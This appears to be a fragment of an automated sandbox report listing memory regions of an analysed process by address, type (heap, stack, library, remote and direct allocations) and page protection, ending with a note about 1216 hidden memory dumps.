trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
5B10000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
22E20000
trusted library allocation
page read and write
207E0000
heap
page execute and read and write
2AB2000
heap
page read and write
64E000
stack
page read and write
33B4000
heap
page read and write
8E74E7E000
unkown
page readonly
22E40000
trusted library allocation
page read and write
47D0000
heap
page read and write
22E40000
trusted library allocation
page read and write
7C5E000
stack
page read and write
7C20000
trusted library allocation
page read and write
7587000
heap
page read and write
808A000
heap
page read and write
2AB9000
heap
page read and write
8E7627E000
unkown
page readonly
809D000
heap
page read and write
5D62000
heap
page read and write
7CE0000
trusted library allocation
page read and write
29B0000
heap
page read and write
22E40000
trusted library allocation
page read and write
2A2B000
heap
page read and write
7FE4000
heap
page read and write
8E7547E000
unkown
page readonly
2A86000
heap
page read and write
8E74C7E000
unkown
page readonly
2D3E000
unkown
page read and write
4C40000
heap
page readonly
2ACD000
heap
page read and write
4F87000
heap
page read and write
7C9000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
4D4C000
heap
page read and write
217F1000
trusted library allocation
page read and write
21BD9A60000
trusted library section
page readonly
89C0000
trusted library allocation
page execute and read and write
21BDE1B0000
remote allocation
page read and write
21BDE24E000
heap
page read and write
4F80000
heap
page read and write
4FED000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
23560000
trusted library allocation
page read and write
7C10000
heap
page read and write
70E0000
trusted library allocation
page read and write
2A83000
heap
page read and write
201FD000
stack
page read and write
2AB2000
heap
page read and write
808A000
heap
page read and write
530000
heap
page read and write
7D0000
trusted library allocation
page read and write
5D5C000
heap
page read and write
6FC0000
trusted library allocation
page execute and read and write
2A78000
heap
page read and write
21BD8C2B000
heap
page read and write
4D60000
heap
page read and write
22920000
heap
page read and write
22E60000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
2A6E000
heap
page read and write
8D40000
direct allocation
page read and write
5D56000
heap
page read and write
21BD8C43000
heap
page read and write
49D9000
trusted library allocation
page read and write
794C000
heap
page read and write
20480000
remote allocation
page read and write
2A91000
heap
page read and write
21BD8CBA000
heap
page read and write
207BD000
trusted library allocation
page read and write
2ABD000
stack
page read and write
2A4D000
heap
page read and write
333A000
trusted library allocation
page execute and read and write
33A4000
heap
page read and write
4CC1000
heap
page read and write
21BDE1B0000
remote allocation
page read and write
2A74000
heap
page read and write
2A7F000
heap
page read and write
8065000
heap
page read and write
C35000
unkown
page readonly
87E0000
trusted library allocation
page read and write
6F95000
trusted library allocation
page read and write
70E7000
trusted library allocation
page read and write
8CD0000
direct allocation
page read and write
21BDE0F0000
trusted library allocation
page read and write
7FE4000
heap
page read and write
8E7577E000
unkown
page readonly
22E40000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
2298B000
heap
page read and write
21BDE170000
trusted library allocation
page read and write
4974000
heap
page read and write
87C0000
trusted library allocation
page read and write
22E30000
trusted library allocation
page read and write
80B3000
heap
page read and write
22E90000
trusted library allocation
page execute and read and write
21819000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
28BE000
stack
page read and write
30C1000
heap
page read and write
2AAA000
heap
page read and write
2A11000
heap
page read and write
2ABB000
heap
page read and write
20790000
trusted library allocation
page read and write
20660000
heap
page read and write
22E90000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
1CA000
stack
page read and write
8677000
stack
page read and write
22E51000
trusted library allocation
page read and write
8E75C7C000
stack
page read and write
85F0000
trusted library allocation
page read and write
496B000
trusted library allocation
page read and write
51FE000
stack
page read and write
4D29000
stack
page read and write
4CB6000
heap
page read and write
690000
heap
page read and write
7107000
trusted library allocation
page read and write
8D90000
direct allocation
page read and write
7A0B000
heap
page read and write
2A93000
heap
page read and write
8360000
trusted library allocation
page read and write
8E758FE000
stack
page read and write
2A23000
heap
page read and write
3280000
heap
page read and write
21BDE050000
trusted library allocation
page read and write
47F9000
trusted library allocation
page read and write
2A2B000
heap
page read and write
3239000
heap
page read and write
5D5B000
heap
page read and write
8003000
heap
page read and write
21BDE030000
trusted library allocation
page read and write
21BD8C59000
heap
page read and write
7A9000
stack
page read and write
4C20000
heap
page read and write
800B000
heap
page read and write
808A000
heap
page read and write
22E50000
trusted library allocation
page read and write
205B0000
trusted library allocation
page read and write
21BDE21F000
heap
page read and write
5D64000
heap
page read and write
2CFD000
stack
page read and write
4CBB000
heap
page read and write
22EB0000
trusted library allocation
page execute and read and write
29CA000
trusted library allocation
page execute and read and write
2A9F000
heap
page read and write
7C80000
trusted library allocation
page read and write
590D000
stack
page read and write
4E91000
trusted library allocation
page read and write
4F6E000
stack
page read and write
C35000
unkown
page readonly
22EA0000
trusted library allocation
page read and write
8680000
heap
page read and write
8057000
heap
page read and write
5675000
trusted library allocation
page read and write
2918000
trusted library allocation
page read and write
5D32000
heap
page read and write
8C00000
trusted library allocation
page read and write
C4D000
unkown
page readonly
32E0000
trusted library section
page read and write
563E000
stack
page read and write
44D0000
heap
page read and write
5D32000
heap
page read and write
7AB5000
trusted library allocation
page read and write
21BD9A40000
trusted library section
page readonly
22E30000
trusted library allocation
page read and write
7B7E000
stack
page read and write
22E40000
trusted library allocation
page read and write
2AAE000
heap
page read and write
6EAF000
heap
page read and write
C30000
unkown
page readonly
540000
heap
page read and write
516C000
stack
page read and write
21BDE050000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
4D8E000
stack
page read and write
3470000
heap
page readonly
352E000
stack
page read and write
305F000
unkown
page read and write
6039000
trusted library allocation
page read and write
6EAC000
heap
page read and write
21BD9940000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
322D000
stack
page read and write
7927000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
3370000
heap
page read and write
5689000
trusted library allocation
page read and write
2ACC000
heap
page read and write
22E60000
trusted library allocation
page read and write
3560000
heap
page read and write
6FE000
stack
page read and write
4D4E000
stack
page read and write
720F000
stack
page read and write
22E50000
trusted library allocation
page read and write
229D6000
heap
page read and write
22E50000
trusted library allocation
page read and write
315F000
stack
page read and write
20380000
heap
page read and write
5EFA000
trusted library allocation
page read and write
23550000
trusted library allocation
page read and write
29C0000
heap
page read and write
22E50000
trusted library allocation
page read and write
2AA9000
heap
page read and write
2870000
trusted library allocation
page read and write
897D000
stack
page read and write
21BDE241000
heap
page read and write
22E50000
trusted library allocation
page read and write
21BD8C74000
heap
page read and write
22E50000
trusted library allocation
page read and write
2023C000
stack
page read and write
30B8000
heap
page read and write
22E50000
trusted library allocation
page read and write
30C3000
heap
page read and write
4C50000
heap
page read and write
8142000
heap
page read and write
7C00000
trusted library allocation
page execute and read and write
2A9A000
heap
page read and write
2A9F000
heap
page read and write
229DC000
heap
page read and write
489B000
stack
page read and write
2A91000
heap
page read and write
C4D000
unkown
page readonly
4912000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
5D64000
heap
page read and write
29CE000
heap
page read and write
4D4C000
stack
page read and write
C31000
unkown
page execute read
22E40000
trusted library allocation
page read and write
4CC4000
heap
page read and write
5D53000
heap
page read and write
8017000
heap
page read and write
5D53000
heap
page read and write
2A98000
heap
page read and write
2A88000
heap
page read and write
21BDE140000
trusted library allocation
page read and write
21BD8C79000
heap
page read and write
A10000
heap
page read and write
89D6000
heap
page read and write
2B4D000
stack
page read and write
47D6000
heap
page read and write
8690000
trusted library allocation
page execute and read and write
2E30000
heap
page read and write
21BD9B80000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8A05000
heap
page read and write
3310000
trusted library allocation
page read and write
22E30000
trusted library allocation
page read and write
B99000
stack
page read and write
8E75A7E000
unkown
page readonly
8CF0000
direct allocation
page read and write
8091000
heap
page read and write
7FC1000
heap
page read and write
2A8D000
heap
page read and write
C37000
unkown
page readonly
21BDDFF0000
trusted library allocation
page read and write
6D1F000
stack
page read and write
2AA3000
heap
page read and write
7C0000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
4CEB000
stack
page read and write
5D6D000
heap
page read and write
There are 1216 hidden memdumps, click here to show them.